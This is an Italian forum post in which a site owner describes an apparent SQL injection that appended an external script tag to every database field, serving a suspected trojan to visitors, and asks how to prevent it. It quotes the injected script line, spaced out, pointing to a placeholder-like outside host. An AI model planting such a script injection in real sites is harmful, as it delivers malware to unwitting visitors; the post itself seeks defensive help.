Ciao a tutti,


ho subito un attacco di sql injection, immagino... , praticamente qualcuno da uno dei form di un sito fatto da me ha eseguito una update su tutti i campi di tutte le tabelle del database inserendo la chiamata di uno script che si trova su un sito cinese.

Praticamente tutti i miei utenti del mio sito aprendo la pagina iniziale senza accorgersi si scaricano un file js che secondo me è un troyan o qualcosa del genere.

come dicevo in tutti i campi di tutte le tabelle dopo il valore che c'era precedentemente hanno inserito una cosa del genere:
< s c r i p t src = h t t p :// www . sitoincriminato . com/b.js>< / s c r i p t >

Ho risolto sostituendo in tutte le tabelle quella stringa con niente... e il sito funzionava... qualche ora dopo è tornato tutto come prima... sono stato vittima per la seconda volta dello stesso attacco

Il problema è... come prevenire prossimi attacchi? come posso fare? avete qualche idea?